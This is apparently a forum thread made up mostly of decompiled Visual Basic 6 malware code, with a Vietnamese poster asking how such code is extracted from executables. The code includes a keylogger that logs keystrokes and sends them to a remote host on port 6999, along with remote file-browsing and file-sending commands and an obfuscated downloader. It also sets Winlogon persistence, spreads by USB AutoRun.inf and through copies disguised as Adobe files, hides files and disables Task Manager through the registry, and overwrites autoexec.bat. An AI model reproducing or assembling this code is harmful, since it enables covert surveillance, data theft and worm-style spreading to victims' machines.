loc_412533: If CBool((Me.global_88 = "Saturday") Or (Me.global_88 = "Tuesday")) Then '412595
loc_412544: var_AC = CVar(Unknown_40F54C(Me.global_88, CLng(Me.global_72), &H0, &H0, Me.global_72, "", "", "", "") & "\kdcoms32.dll") 'String
loc_412553: If Not (Unknown_40F1FC(var_AC)) Then '41256C
loc_412564: Timer4.Enabled = &HFF
loc_41256C: End Ifloc_40F2B1: LitStr "\userinit.exe"
....
loc_40F2C2: LitStr "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
loc_410A66: LitStr "\system32\system.exe"
loc_41207D: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe", &H0)
loc_4120B7: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", Unknown_40F54C() & "\system32\userinit.exe,")
loc_4121A3: var_AC = CVar(Unknown_40F54C("") & "\kdcoms.dll") 'String
loc_4121B1: If Unknown_40F1FC(var_AC) Then '4121FA
loc_4121CD: var_C8 = Unknown_40F54C() & "\kdcoms.dll"
loc_4121D0: ext_401090
loc_4121EC: var_AC = CVar(Unknown_40F54C("", &H0) & "\kdcoms.dll") 'String
loc_4121EF: ext_401030
loc_4121FA: End If
Private Sub Timer4_Timer() '4101D0
'Data Table: 40BD20
loc_4100D4: On Error GoTo 0
loc_4100E5: Timer4.Enabled = &H0
loc_4100FB: var_9C = CVar(Unknown_40F54C() & "\kdcoms32.dll") 'String
loc_410109: If Unknown_40F1FC(var_9C) Then '4101CA
loc_41011C: If (Me.global_88 = "Tuesday") Then '410174
loc_41014A: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8qj hxwurwn8orun|8}j|t7{j{", &H9))) & "\system32\task.exe") 'String
loc_410158: Call var_88.DL1.Address_4165C0
loc_410171: GoTo loc_4101C8
loc_410174: End If
loc_4101A1: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8yq~xwp6qxwp8orun|8}j|t7{j{", &H9)), var_C8) & "\system32\task.exe") 'String
loc_4101AF: Call var_88.DL1.Address_4165C0
loc_4101C8: ' Referenced from: 410171
loc_4101CA: End If
loc_4101CE: Exit Sub
End SubPublic Function Decode(Data, Depth) '40FD1C
'Data Table: 40BD20
loc_40FC5A: On Error GoTo 0
loc_40FC69: For var_9A = &H1 To CInt(Len(Data)): var_96 = var_9A 'Integer
loc_40FC71: var_BC = 1
loc_40FC82: var_8C = ext_401018
loc_40FC92: var_8E = ext_401004
loc_40FC9D: If (Depth = &H0) Then '40FCA7
loc_40FCA4: Depth = &H28
loc_40FCA7: End If
loc_40FCB0: If (Depth > 254) Then '40FCBB
loc_40FCB8: Depth = 254
loc_40FCBB: End If
loc_40FCCF: If ((var_8E - Depth) < &H0) Then '40FCDE
loc_40FCDB: var_8E = (var_8E + 255)
loc_40FCDE: End If
loc_40FCE7: ext_401054
loc_40FCFF: var_94 = var_94 & CStr("")
loc_40FD07: Next var_9A 'Integer
loc_40FD11: var_88 = var_94
loc_40FD16: Result = arg_14: Exit Sub
End FunctionPublic Function Decode(Data As String, Optional Depth As Integer) As String
Dim TempChar As String
Dim TempAsc As Integer
Dim NewData As String
Dim vChar As Integer
For vChar = 1 To Len(Data)
TempChar = Mid$(Data, vChar, 1)
TempAsc = Asc(TempChar)
If Depth = 0 Then Depth = 40
If Depth > 254 Then Depth = 254
TempAsc = TempAsc - Depth
If TempAsc < 0 Then TempAsc = TempAsc + 255
TempChar = Chr(TempAsc)
NewData = NewData & TempChar
Next vChar
Decode = NewData
End Functionloc_41141B: var_1AC = var_17C And (var_17C <> "A")
loc_41142A: ext_401088
loc_411435: ext_40102C
loc_41145A: If CBool(var_1CC And (var_1CC <> "B")) Then '411B9C
loc_411461: var_86 = &HFF
loc_411477: var_15C = var_DC & "\" & "Secret.exe"
loc_41147F: VarLateMemCallLdVar
loc_411496: If CBool(Not var_9C) Then '41154F
loc_4114E2: var_21C = CStr(var_DC & "\" & "Secret.exe")
loc_4114FB: var_218 = App.Path & "\" & App.EXEName & ".exe"
loc_4114FE: ext_401070
loc_41153C: var_204 = CStr(var_DC & "\" & "Secret.exe")
loc_411540: ext_401090
loc_41154F: End If
loc_41155B: var_12C = var_DC & "\AutoRun.inf"
loc_411563: VarLateMemCallLdVar
loc_411574: If CBool(var_9C) Then '4115AF
loc_41158A: var_204 = CStr(var_DC & "\AutoRun.inf")
loc_41158E: ext_401090
loc_4115A3: var_12C = var_DC & "\AutoRun.inf"
loc_4115A7: ext_401030
loc_4115AF: End If
loc_4115C7: Open CStr(var_DC & "\AutoRun.inf") For Output As &H1 Len = &HFF
loc_4115D8: Print &H1, "[AutoRun]"
loc_4115E5: Print &H1, "open=Secret.exe"
loc_4115F2: Print &H1, ";shell\open=Open(&O)"
loc_4115FF: Print &H1, "shell\open\Command=Secret.exe"
loc_41160C: Print &H1, "shell\open\Default=1"
loc_411619: Print &H1, ";shell\explore=Manager(&X)"
loc_411626: Print &H1, "shell\explore\Command=Secret.exe"
loc_411630: Close &H1
loc_411645: var_204 = CStr(var_DC & "\AutoRun.inf")Public Sub init() '410078
'Data Table: 40BD20
loc_40FFA0: On Error GoTo 0
loc_40FFB1: var_98 = CVar(Unknown_40F54C() & "\system32\MSWINSCK.OCX") 'String
loc_40FFC0: If Not (Unknown_40F1FC(var_98)) Then '410056
loc_410006: Open Unknown_40F54C() & "\system32\MSWINSCK.OCX" For Binary As &H1 Len = &HFF
loc_41001D: Put &H1, &H1, LoadResData(101, "CUSTOM")
loc_410025: Close &H1
loc_410044: ext_40103C
loc_410049: var_CC = CVar(%x2 & Unknown_40F54C("Regsvr32", &H2) & "\system32\MSWINSCK.OCX /s")
loc_410056: End If
loc_41006A: Load MemVar_416064
loc_410074: Exit Sub
End SubPrivate Sub Timer1_Timer() '40F884
'Data Table: 40B764
loc_40F7F4: On Error GoTo 0
loc_40F805: Timer1.Enabled = &H0
loc_40F819: var_98 = var_88.@filesize@
loc_40F82A: If (CInt(var_98) <> &H7) Then '40F867
loc_40F839: call var_88..Address_40D1F0
loc_40F846: var_A8 = "scsd.ath.cx"
loc_40F84C: var_C8 = 6999
loc_40F85C: call var_88..Address_40D1E0
loc_40F867: End If
loc_40F877: var_88.Timer.Enabled = &HFF
loc_40F881: Exit Sub
End SubPrivate Sub ws_() '410D48
'Data Table: 40B764
loc_410B14: On Error GoTo 0
loc_410B32: Call var_9C.ws.Address_40BA0C
loc_410B57: If (InStr(&H1, "", "@chdirec@", &H0) <> &H0) Then '410BED
loc_410B79: var_88 = ext_401048
loc_410B81: ext_401050
loc_410B8E: ext_401068
loc_410BA4: Dir1.Path = CStr(var_BC)
loc_410BBE: ext_401068
loc_410BD4: File1.Path = CStr(var_BC)
loc_410BE8: Call sendinfo
loc_410BED: End If
loc_410C09: If (InStr(&H1, var_88, "@chdrv@", &H0) <> &H0) Then '410C9F
loc_410C2B: var_88 = ext_401048
loc_410C33: ext_40105C
loc_410C40: ext_401068
loc_410C56: Dir1.Path = CStr(var_BC)
loc_410C70: ext_401068
loc_410C86: File1.Path = CStr(var_BC)
loc_410C9A: Call sendinfo
loc_410C9F: End If
loc_410CBB: If (InStr(&H1, var_88, "@sendfile@", &H0) <> &H0) Then '410D1B
loc_410CC6: Me.global_72 = True
loc_410CEF: Me.global_52 = CVar(ext_401048)
loc_410CFA: Close &H1
loc_410D0D: Open CStr(Me.global_52) For Binary As &H1 Len = &HFF
loc_410D16: Call SendFile
loc_410D1B: End If
loc_410D37: If (InStr(&H1, var_88, "@cancel@", &H0) <> &H0) Then '410D44
loc_410D41: Me.global_104 = &HFF
loc_410D44: End If
loc_410D46: Exit Sub
End SubPrivate Sub Timer2_Timer() '411044
'Data Table: 40B764
loc_410D90: On Error GoTo 0
loc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68)
loc_410DCA: If ((MemVar_416040 <> "") And (Len(MemVar_416040) > &H2)) Then '410E70
loc_410E07: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410E2F
loc_410E13: var_A0 = CVar("@yahoo@" & MemVar_416040) 'String
loc_410E21: call var_90..Address_0
loc_410E2F: End If
loc_410E46: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_410E58: Print &H2, MemVar_416040
loc_410E62: Close &H2
loc_410E6F: Exit Sub
loc_410E70: End If
loc_410E8F: If (InStr(&H1, Me.global_68, "@enter@", &H0) <> &H0) Then '410F7F
loc_410EBA: Me.global_68 = ext_401048
loc_410ECE: If (Me.global_68 <> "") Then '410F7A
loc_410F0B: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410F36
loc_410F1A: var_A0 = CVar("@yahoo@" & Me.global_68) 'String
loc_410F28: call var_90..Address_0
loc_410F36: End If
loc_410F4D: Open Unknown_40F54C("", Me.global_68, "@enter@", "", &H1, &HFFFFFFFF, &H1) & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_410F62: Print &H2, Me.global_68
loc_410F6C: Close &H2
loc_410F7A: End If
loc_410F7E: Exit Sub
loc_410F7F: End If
loc_410F90: If (Len(Me.global_68) > &H37) Then '41103C
loc_410FCD: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410FF8
loc_410FDC: var_A0 = CVar("@yahoo@" & Me.global_68) 'String
loc_410FEA: call var_90..Address_0
loc_410FF8: End If
loc_41100F: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_411024: Print &H2, Me.global_68
loc_41102E: Close &H2
loc_41103C: End If
loc_411040: Exit Sub
End Subloc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68)
Những chữ in đậm đó là gì? Có thể tìm ở đâu? Cách sử dụng như thế nào? Làm sao để biết và lấy các code đó trong 1 tập tin .exe vậy? Bác có tài liệu này hay đã đọc ở đâu kô chỉ cho em biết với? Tạo file virus thì kô ham, nhưng đọc được các đoạn code của các chương trình nước ngoài mới thì sẽ rất có ích cho việc viết code đấy bác?! Thân.
Private Sub Form_Load() '403574
'Data Table: 401838
loc_40353B: App.TaskVisible = 0
If App.PrevInstance Then '403567
loc_403565: End
End If
loc_40356A: var_9C = funct0()
loc_403572: Exit Sub
End SubPublic Function funct0() '405960
'Data Table: 401838
Dim var_AC As Variant
loc_405782: On Error Resume Next
loc_4057B1: var_CC = Ucase(CVar(App.Path)) 'Variant
If (var_CC = funct1(0)) Then '4057E4
loc_4057DE: Result = arg_C: Exit Sub
End If
loc_4057EB: var_FC = "\" 'Variant
If CBool(Right(var_CC, 1) <> var_FC) Then '40581F
loc_40581B: var_CC = var_CC & var_FC 'Variant
End If
loc_40584B: var_10C = Ucase(CVar(App.EXEName)) 'Variant
If (var_10C = Ucase("Thumbs")) Then '4058AE
loc_405890: var_AC = InStr(1, var_CC, ":", 0)
loc_4058A4: var_11C = Left(var_CC, CLng(%x1)) 'Variant
loc_4058AB: GoTo loc_4058E0
End If
loc_4058D9: var_11C = var_CC & Left(var_10C, CLng((Len(var_10C) - 1))) 'Variant
loc_4058E0: ' Referenced from: 4058AB
loc_4058E7: var_AC = funct2()
loc_4058F7: var_AC = funct3(var_11C)
loc_40593E: ShellExecute(Me.Hwnd, "open", CStr(var_11C), "", "", 1)
loc_405953: End
loc_405957: Result = arg_C: Exit Sub
End FunctionPublic Function funct2() '405BF8
'Data Table: 401838
Dim var_168 As Double
loc_4059D2: On Error Resume Next
loc_4059F6: var_AC = CVar(App.EXEName) 'Variant
loc_405A1E: var_CC = CVar(App.Path) 'Variant
If CBool(Right(var_CC, 1) <> "\") Then '405A5A
loc_405A56: var_CC = var_CC & "\" 'Variant
End If
loc_405A6F: var_FC = var_CC & var_AC & ".com" 'Variant
loc_405A8B: var_10C = var_CC & var_AC & ".scr" 'Variant
loc_405AAD: var_13C = funct1(0) & "\" 'Variant
loc_405ACF: var_14C = var_13C & "Adobe update" & ".com" 'Variant
loc_405AED: var_15C = var_13C & "Adobe Online" & ".com" 'Variant
loc_405B04: FileCopy CStr(var_FC), CStr(var_14C)
loc_405B20: FileCopy CStr(var_FC), CStr(var_15C) loc_405B3C: FileCopy CStr(var_10C), CStr(var_14C)
loc_405B58: FileCopy CStr(var_10C), CStr(var_15C)
loc_405B8A: FileCopy CStr(var_CC & "Thumbs .db"), CStr(funct1(1))
loc_405BBA: SetAttr CStr(funct1(1)), 3
loc_405BD8: var_168 = Shell(var_14C, 2)
loc_405BEA: var_168 = Shell(var_15C, 2)
loc_405BEF: Result = arg_C: Exit Sub
End Functionloc_405B04: FileCopy CStr(var_FC), CStr(var_14C)
loc_405B20: FileCopy CStr(var_FC), CStr(var_15C)Public Function funct3(a) '404DDC
'Data Table: 401838
Dim var_314 As Variant
Dim var_338 As String
loc_404C86: On Error Resume Next
loc_404C90: var_2F4 = "\" 'Variant
loc_404C98: DoEvents
If CBool(Right(a, 1) <> var_2F4) Then '404CCF
loc_404CCC: a = a & var_2F4
End If
loc_404CEC: var_338 = CStr(a & "*")
loc_404D10: var_490 = CVar(FindFirstFile(var_338, Record Of arg_1E)) 'Variant
loc_404D3D: var_314 = funct4(var_2B8, a, arg_1E)
loc_404D48: var_2B8 = var_338
loc_404D59: var_5E0 = Record Of arg_1E 'Copy battery of vars to single variable
If (FindNextFile(CLng(var_490), var_5E0) <> 0) Then '404DBA
loc_404DA1: var_314 = funct4(var_2B8, a, arg_1E)
loc_404DAC: var_2B8 = var_338
loc_404DB7: GoTo loc_404D51
End If
loc_404DC1: FindClose(CLng(var_490))
loc_404DC9: Result = arg_10: Exit Sub
loc_404DD1: GoTo loc_404C96
loc_404DD6: Result = arg_10: Exit Sub
End FunctionPrivate Sub Timer1_Timer() '4034F4
'Data Table: 401838
loc_4034C7: var_94 = funct5()
loc_4034D2: var_94 = funct6()
loc_4034DD: var_94 = funct9()
loc_4034E8: var_94 = funct10()
loc_4034F0: Exit Sub
End SubPublic Function funct5() '405F80
'Data Table: 401838
Dim var_C8 As Variant
loc_405C67: var_A4 = "HKEY_CLASSES_ROOT\scrfile" 'Variant
loc_405C78: var_C8 = Unknown_404014(CStr(var_A4))
loc_405C93: var_C8 = Unknown_404854(CStr(var_A4), "")
loc_405CAE: var_C8 = Unknown_404854(CStr(var_A4), "InfoTip", "")
loc_405CC9: var_C8 = Unknown_404854(CStr(var_A4), "NeverShowExt", "")
loc_405CE4: var_C8 = Unknown_404854(CStr(var_A4), "TileInfo", "")
loc_405D08: var_D8 = Unknown_404854(CStr(var_A4 & "\shell\open\command"), "", "%1")
loc_405D1C: var_E8 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\" 'Variant
loc_405D2C: var_F8 = var_E8 & "Windows NT\CurrentVersion\Winlogon" 'Variant
loc_405D40: var_C8 = Unknown_404854(CStr(var_F8), "LegalNoticeCaption", "81u3f4nt45y - 24.01.2007 - Surabaya")
loc_405DA1: var_C8 = Unknown_404854(CStr(var_F8), "LegalNoticeText", "Surabaya in my birthday" & vbCrLf & "Don" & Chr(39) & "t kill me, i" & Chr(39) & "m just send message from your computer" & vbCrLf & "Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti" & vbCrLf & "Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku" & vbCrLf & "Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal" & vbCrLf & "Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0")
loc_405DC7: var_130 = "CheckedValue" 'Variant
loc_405DD0: var_140 = "DefaultValue" 'Variant
loc_405DE0: var_150 = var_E8 & "Windows\CurrentVersion\explorer\Advanced\Fold er\" 'Variant
loc_405DF0: var_160 = var_150 & "Hidden\" 'Variant
loc_405E00: var_170 = var_160 & "NOHIDDEN" 'Variant
loc_405E1A: var_C8 = Unknown_4044D4(CStr(var_170), CStr(var_130), 2)
loc_405E3F: var_C8 = Unknown_4044D4(CStr(var_170), CStr(var_140), 2)
loc_405E5A: var_170 = var_160 & "NOHIDORSYS" 'Variant
loc_405E74: var_C8 = Unknown_4044D4(CStr(var_170), CStr(var_130), 0)
loc_405E99: var_C8 = Unknown_4044D4(CStr(var_170), CStr(var_140), 2)
loc_405EB4: var_170 = var_160 & "SHOWALL" 'Variant
loc_405ECE: var_C8 = Unknown_4044D4(CStr(var_170), CStr(var_130), 0)
loc_405EF3: var_C8 = Unknown_4044D4(CStr(var_170), CStr(var_140), 2)
loc_405F0E: var_170 = var_150 & "HideFileExt" 'Variant
loc_405F28: var_C8 = Unknown_4044D4(CStr(var_170), CStr(var_130), 1)
loc_405F4D: var_C8 = Unknown_4044D4(CStr(var_170), CStr(var_140), 1)
loc_405F6E: var_C8 = Unknown_4044D4(CStr(var_170), "UncheckedValue", 1)
loc_405F79: Result = arg_C: Exit Sub
End FunctionPublic Function funct6() '403B6C
'Data Table: 401838
For var_F4 = 67 To 90: var_A4 = var_F4 'Variant
loc_403AD1: DoEvents
If (funct7(Chr(CLng(var_A4))) > 0) Then '403B5A
loc_403B25: var_134 = Chr(CLng(var_A4)) & ":" & "\" 'Variant
loc_403B36: var_104 = funct3(var_134)
loc_403B44: var_104 = funct8(var_134)
loc_403B52: var_104 = funct11(var_134)
End If
Next var_F4 'Variant
loc_403B63: Result = arg_C: Exit Sub
End FunctionPublic Function funct9() '404A00
'Data Table: 401838
Dim var_B4 As Integer
loc_4048B2: On Error Resume Next
loc_4048C7: var_D4 = funct1(0) 'Variant
loc_4048E2: var_B4 = InStr(1, var_D4, ":", 0)
loc_4048FF: var_104 = Left(var_D4, CLng(%x1)) & "Autoexec.bat" 'Variant
If (Dir(var_104) <> "") Then '40492F
loc_404929: Result = arg_C: Exit Sub
End If
loc_40493D: SetAttr CStr(var_104), 0
loc_40494A: Kill var_104
loc_40495D: Open CStr(var_104) For Output As 1 Len = &HFF
loc_4049CD: Print 1, "@Echo Off" & vbCrLf & "Echo 81u3f4nt45y - 24.01.2007" & vbCrLf & "Echo Don" & Chr(39) & "t kill me, i" & Chr(39) & "m just send message from your computer" & vbCrLf & "Echo Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti" & vbCrLf & "Echo Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku" & vbCrLf & "Echo Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal" & vbCrLf & "Echo Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0" & vbCrLf & "pause"
loc_4049F6: Close 1
loc_4049FA: Result = arg_C: Exit Sub
End FunctionPublic Function funct10() '40417C
'Data Table: 401838
Dim var_148 As Double
loc_404066: On Error Goto loc_40416F
loc_404082: var_F4 = funct1(0) & "\" 'Variant
loc_4040A2: var_104 = var_F4 & "Adobe Online" & ".com" 'Variant
loc_4040BE: var_114 = var_F4 & "Adobe update" & ".com" 'Variant
If (Ucase(CVar(App.EXEName)) = Ucase("Adobe Online")) Then '404145
loc_404126: FileCopy CStr(var_104), CStr(var_114)
loc_40413F: var_148 = Shell(var_114, 2)
loc_404142: GoTo loc_40416F
End If
loc_404153: FileCopy CStr(var_114), CStr(var_104)
loc_40416C: var_148 = Shell(var_104, 2)
loc_40416F: ' Referenced from: 404066
loc_40416F: ' Referenced from: 404142
loc_40416F: Result = arg_C: Exit Sub
loc_404175: Result = arg_C: Exit Sub
End FunctionPrivate Sub Command1_Click()
Dim str1 As String
str1 = Text1
str1 = Replace(str1, "Chr$(&H", "", , , vbBinaryCompare)
str1 = Replace(str1, ") & ", "", , , vbBinaryCompare)
Text2 = str1
Dim kq As String
For i = 1 To Len(str1) Step 2
kq = kq & Chr(HexToDec(Mid(str1, i, 2)))
Next
Text2 = kq
End SubPrivate Function HexToDec(GT As String) As Integer
'Viet nhanh voi truong hop chi xet 2 Byte (De giai ma doan ma VBS can xet)
HexToDec = LayGT(Mid(GT, 1, 1)) * 16 + LayGT(Mid(GT, 2, 1))
End Function
Private Function LayGT(GT As String) As Integer
If (GT <> "0") And (Val(GT) = 0) Then
LayGT = 9 + Asc(UCase(GT)) - 64
Else
LayGT = Val(GT)
End If
End FunctionIf (Right$(CStr(Command$), Len("trongcaicuocsongconthangnaolithangdongon")) = "trongcaicuocsongconthangnaolithangdongon") Then
loc_4087EA: var_A4 = LCase$(Left$(CStr(Command$), CLng((Len(Command$) - CVar(Len("trongcaicuocsongconthangnaolithangdongon "))))))
loc_408800: MemVar_411054 = Unknown_40934C()
loc_40880F: CRefVarAry
For var_E8 = 0 To CInt(UBound(MemVar_411054, 1)): MemVar_411064 = var_E8 'Integer
If CBool(CVar(var_A4) Like (("*" + MemVar_411054(MemVar_411064)) + "*")) Then
loc_40885B: Exit Sub
End If
Next var_E8 'Integer
loc_40887C: var_120 = Shell(var_A4, 1)
End Ifloc_407CC8: If (Command$ = "tungtang") Then
loc_407CCB: GoTo loc_407CF7
loc_407CCE: End If
loc_407CE6: If CBool(Command$ <> "tungtang") Then
loc_407CEB: Unknown_40C148()
loc_407CF2: Unknown_410434()
loc_407CF7: ' Referenced from: 407CCB
loc_407CF7: End Ifloc_40B36B: If (Command$ = "o") Then
loc_40B4B1: var_124 = Shell("explorer.exe" & " " & App.Path, 3)
loc_40B507: GoTo loc_40C142
loc_40B50A: End If
loc_40B522: If (Command$ = "e") Then
loc_40B6B4: var_124 = Shell("explorer.exe/e," & " " & App.Path, 3)
loc_40B71E: GoTo loc_40C142
loc_40B721: End If
loc_40B739: If (Command$ = "init") Then
loc_40B858: var_124 = Shell("explorer.exe", 0)
loc_40B8A5: GoTo loc_40C142
loc_40B8A8: End If
loc_40B8C0: If (Command$ = "ie") Then
loc_40BCD9: var_124 = Shell(CVar(Left$(MemVar_4110F4, 3) & "Program Files\Internet Explorer\IEXPLORE.EXE"), 1)
loc_40BDEC: GoTo loc_40C142
loc_40BDEF: End Ifloc_40E8D8: MemVar_41107C = "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
loc_40EA4E: MemVar_411080 = Left$(MemVar_41107C, (Len(MemVar_41107C) - 8)) & "Shell"
loc_40EB96: MemVar_411084 = "HKEY_CLASSES_ROOT\"
loc_40EDAE: MemVar_4110A0 = MemVar_411084 & "exefile\shell\open\command\"
loc_40F2E9: MemVar_411088 = MemVar_411084 & "CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\"
loc_40F926: MemVar_41108C = "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr"
loc_40FB4E: MemVar_411090 = Left$(MemVar_41108C, (Len(MemVar_41108C) - 7)) & "RegistryTools"
loc_40FD35: MemVar_411094 = Left$(MemVar_41108C, (Len(MemVar_41108C) - &H15)) & "Explorer\NoFolderOptions"
loc_41024E: MemVar_411098 = "HKCU\Software\Microsoft\Windows\CurrentVersion\Ex plorer\Advanced\Hidden"
loc_410409: MemVar_41109C = Left$(MemVar_411098, (Len(MemVar_411098) - 3)) & "eFileExt"loc_40CCD6: If (var_3A4 = "megabyte") Then
loc_40CD12: var_3AC = Shell(CVar(Unknown_40784C(MemVar_4110F4, MemVar_4110A6) & var_3A4 & ".exe" & " " & "init"), 1)
loc_40CD25: GoTo loc_40CDDD
loc_40CD28: End If
loc_40CD32: If (var_3A4 = "250mb") Then
loc_40CD6E: var_3AC = Shell(CVar(Unknown_40784C(MemVar_4110F4, var_3AC) & var_3A4 & ".exe" & " " & "rash"), 1)
loc_40CD81: GoTo loc_40CDDD
loc_40CD84: End If
loc_40CD8E: If (var_3A4 = "tungtang") Then
loc_40CDCA: var_3AC = Shell(CVar(Unknown_40784C(MemVar_4110F4, var_3AC) & var_3A4 & ".exe" & " " & "speechanddown"), 1)
loc_40CDDD: ' Referenced from: 40CD25
loc_40CDDD: ' Referenced from: 40CD81
loc_40CDDD: End If
loc_40CDDF: GoTo loc_40CEF7
loc_40CDE2: End If
loc_40CDEE: If (var_3A4 = "250mb") Then
loc_40CE2A: var_3AC = Shell(CVar(Unknown_40784C(MemVar_4110F4, var_3AC) & var_3A4 & ".exe" & " " & "rash"), 1)
loc_40CE3D: GoTo loc_40CEF5
loc_40CE40: End If
loc_40CE4A: If (var_3A4 = "megabyte") Then
loc_40CE86: var_3AC = Shell(CVar(Unknown_40784C(MemVar_4110F4, var_3AC) & var_3A4 & ".exe" & " " & "first"), 1)
loc_40CE99: GoTo loc_40CEF5
loc_40CE9C: End If
loc_40CEA6: If (var_3A4 = "tungtang") Then
loc_40CEE2: var_3AC = Shell(CVar(Unknown_40784C(MemVar_4110F4, var_3AC) & var_3A4 & ".exe" & " " & "speechanddown"), 1)
loc_40CEF5: ' Referenced from: 40CE3D
loc_40CEF5: ' Referenced from: 40CE99
loc_40CEF5: End Ifloc_40C3F3: If (Command$ = "tungtang") Then
loc_40C3FB: If MemVar_4113A4 Then
loc_40C403: var_A4 = Time
loc_40C416: ImpAdLdUI1
loc_40C428: If (%x2 = CVar(Minute(var_A4))) Then
loc_40C438: CRefVarAry
loc_40C461: VietTTS (CStr(MemVar_411044(CVar((CLng((Rnd(var_A4) * CDbl(UBound(MemVar_411044, 1)))) / 1)))))
loc_40C479: MemVar_4113A6 = 0
loc_40C4B2: ImpAdCallUI1
loc_40C4B8: MemVar_4113A6 = CByte(Minute(Time))
loc_40C4C5: End If
loc_40C4C9: DoEvents
loc_40C4CE: GoTo loc_40C5AC
loc_40C4D1: End If
loc_40C4D9: If (MemVar_4113A4 = 0) Then
loc_40C4E1: var_A4 = Time
loc_40C4F4: ImpAdLdUI1
loc_40C506: If (MemVar_4113A6 = CVar(Minute(var_A4))) Then
loc_40C516: CRefVarAry
loc_40C53F: VietTTS(CStr(MemVar_411044(CVar((CLng((Rnd(var_A4) * CDbl(UBound(MemVar_411044, 1)))) / 1)))), CByte(((CLng((Rnd(var_C4) * CDbl(&HF))) / 1) + &HA)))
loc_40C557: MemVar_4113A6 = &HFF
loc_40C590: ImpAdCallUI1
loc_40C596: MemVar_4113A6 = CByte(Minute(Time))
loc_40C5A3: End If
loc_40C5A7: DoEvents
loc_40C5AC: ' Referenced from: 40C4CE
loc_40C5AC: End IfPrivate Sub Unknown_4082D0()
'Data Table: 40407C
loc_4081F1: ReDim var_90(0 To &HA)
loc_408208: var_90(0) = "S©u vi tÝnh Mª Ga Bai ®îc cÊu h×nh nh mét m¾c xÝch cña qu¸ tr×nh xö lý cña hÖ ®iÒu hµnh. Mét ch¬ng tr×nh diÖt vi rÊt cã thÓ sÏ xãa mÊt phai cña Mª Ga Bai, dÉn ®Õn sù tª liÖt mét phÇn hay toµn bé hÖ thèng vèn ®· rÊt m«ng manh. §· c¶nh b¸o tríc mµ vÉn lµm th× chÕt r¸ng chÞu"
loc_408217: var_90(1) = "Trong c¸i cuéc sèng cßn th»ng nµo l× th»ng ®ã ngon"
loc_408226: var_90(2) = "S©u m¸y tÝnh Mª Ga Bai kh«ng ¨n c¾p hay g©y h¹i ®Õn d÷ liÖu cña b¹n, mª ga bai chØ muèn ®i du lÞch kh¾p n¬i, rÊt mong c¸c b¹n ñng hé"
loc_408240: var_90(3) = CVar("Mª Ga Bai xin kÓ 1 c©u chuyÖn giµu ý nghÜa, ®ã lµ c©u chuyÖn vÒ hai h¹t mÇm! " & "Mét ngµy kia cã hai mÇm c©y díi ®Êt trß chuyÖn víi nhau: chóng ta ®ang ngÇm chøa mét sù sèng, chóng ta s¾p khai sinh, nhng mÆt ®Êt phÝa " & _
"trªn chóng ta cã mét t¶ng ®¸ lín. Lµm thÕ nµo b©y giê? MÇm c©y thø nhÊt nãi: chóng ta men theo c¹nh t¶ng ®¸ ®ã ®Ó tråi lªn ®ãn ¸nh n¾ng mÆt trêi. MÇm c©y thø hai nãi: sao anh hÌn thÕ, chóng ta cø ®©m th¼ng mµ lªn chø! ThÕ råi mÇm c©y thø hai dòng c¶m ®©m th¼ng vµo t¶ng ®¸ vµ nã kh«ng bao giê nh×n thÊy ¸nh s¸ng mÆt trêi. Cßn mÇn c©y thø nhÊt nh« lªn c¹nh t¶ng ®¸. " & _
"Nh÷ng tia n¾ng mÆt trêi ®Çu tiªn ®îc nh×n thÊy lµm nã sung síng ®Õn ng©y ngÊt, nã thÇm nhñ: thÕ lµ m×nh ®· khai sinh. T¶ng ®¸ thÊy vËy cêi b¶o: Ng¬i chØ lµ mét h¹t mÇm nhá xÝu, cã g× ®¸ng tù hµo l¾m ®©u... MÇm c©y buån l¾m, nã nhÉn n¹i quang hîp, råi mét ngµy kia, c©y to lín, hßn ®¸ l¨n sang mét bªn. Hßn ®¸ im lÆng suèt ®êi nh thÇm tr¸ch... Cßn c©y th× ®¬m hoa vµ ng¸t h¬ng. " & "ChØ cã nh÷ng ®ªm " & _
"hu vÒ nã buån trong tiÕng l¸ r¬i xµo x¹c, cã lÏ nã ®ang nghÜ vÒ ngêi b¹n xÊu sè cña nã. D©u ®ã díi mÆt ®Êt nµy liÖu cßn bao nhiªu mÇm h¹t cã sè phËn nh ngêi b¹n cña nã. " & "NÕu hay th× cho trµn ph¸o tay nµo!")
loc_408253: var_90(4) = "S©u vi tÝnh Mª Ga Bai ®îc viÕt b»ng ng«n ng÷ vi sua b©y sÝc. ViÕt mét s©u vi tÝnh lµ kh«ng khã nh nhiÒu ngêi vÉn tëng, ®iÓm mÊu chèt lµ b¹n cã d¸m lao vµo cuéc hay kh«ng. Tríc ®©y t«i còng ch¼ng biÕt g×, chØ sau 1 th¸ng mµi mß còng lµm ®îc con ®Çu tiªn, vµ sau n÷a n¨m th× viÕt ®îc con Mª Ga Bai"
